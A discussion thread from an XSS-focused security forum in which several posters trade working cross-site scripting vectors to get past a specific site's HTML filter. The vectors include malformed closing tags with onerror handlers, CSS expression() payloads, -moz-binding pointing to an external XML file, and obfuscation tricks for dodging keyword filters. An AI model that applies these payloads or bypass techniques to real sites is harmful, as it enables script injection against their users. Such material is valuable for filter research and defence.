Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
XSS in closing tags?
Posted by: mjmorrell
Date: November 05, 2009 06:26PM

I have been trying to find a hole in this one filter, and I have noticed that they obviously dont allow tags like <script>, <video>, etc. But you can have closing tags like </script> and </video>

Can you do anything with this?

Options: ReplyQuote
Re: XSS in closing tags?
Posted by: sirdarckcat
Date: November 06, 2009 12:28AM

on IE you could, but not anymore, and on HTML5 you will be able to do it..

so, either travel to the future or travel to the past.. :)

greetz

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: XSS in closing tags?
Posted by: Anonymous User
Date: November 06, 2009 02:01AM

x</p<img src=x onerror=alert(1)//>y or x</br<img src=x onerror=alert(2)//>y might help. Works on...

a) no browser at all
b) what is a browser?
c) Firefox of course <-- right answer!

:)

Greetings,
.mario

EDIT: Ah - and you might find this one interesting too: http://pastebin.com/f14dbfdb0



Edited 1 time(s). Last edit at 11/06/2009 02:07AM by .mario.

Options: ReplyQuote
Re: XSS in closing tags?
Posted by: Gareth Heyes
Date: November 06, 2009 02:51AM

How about other tags?

<xml onreadystatechange=alert(1)>test</xml>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: XSS in closing tags?
Posted by: mjmorrell
Date: November 06, 2009 06:36PM

Browser doesn't matter, FF 2/3, IE7+, as long as it works on one is all that I would care.

The filter is one that pretty much only allows certain tags so <xml> doesn't work.

Also, "on*" is blocked so no event handling.

expression( is also blocked

I am out of ideas other than the closing tag

Options: ReplyQuote
Re: XSS in closing tags?
Posted by: thornmaker
Date: November 06, 2009 07:48PM

Firefox 2 lets you use style attributes with -moz-binding to execute JS. something like... style="-moz-binding:url('http://ha.ckers.org/xssmoz.xml#xss')" if i recall correctly.

older versions of IE (7 and before I think) let you do something similar using expressions.... e.g. style="x:expression(alert('XSS'))"

[edit]: there are quite a few weird vectors that work on older browsers... have you looked at the cheat sheet ?



Edited 1 time(s). Last edit at 11/06/2009 07:53PM by thornmaker.

Options: ReplyQuote
Re: XSS in closing tags?
Posted by: sirdarckcat
Date: November 06, 2009 10:27PM

on IE6 you can use expression using best fit mapping chars, and you should really try ex/**/pression and stuff.. if they do detect it, try \e\x\p\r\e\s\s\i\o\n and if they also detect it, try HTML Entitifying it, and if they also detect it, make the entities malformed..

greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: XSS in closing tags?
Posted by: Anonymous User
Date: November 06, 2009 11:30PM

Can we have a look at the site/an example URI? PM? Or is it super super secret?

Options: ReplyQuote
Re: XSS in closing tags?
Posted by: mikefree
Date: November 21, 2009 05:12PM

Yeah,
an URI would be great!

greetings
Mike!

Options: ReplyQuote
Re: XSS in closing tags?
Posted by: Ivan
Date: May 21, 2010 02:45PM

I have something like this:

<td>lorem ipsum</td ##this can be controled## >

I can't use < in ##this can be controled##.


What browser version and attack vector can be used here ?



Thanks,
Ivan

http://www.security-net.biz/

Options: ReplyQuote
Re: XSS in closing tags?
Posted by: Anonymous User
Date: May 21, 2010 04:34PM

<td>lorem ipsum</td style="x:expression(write(1))">

IE5.5-6,7 8 in non-std mode

Options: ReplyQuote


Sorry, only registered users may post in this forum.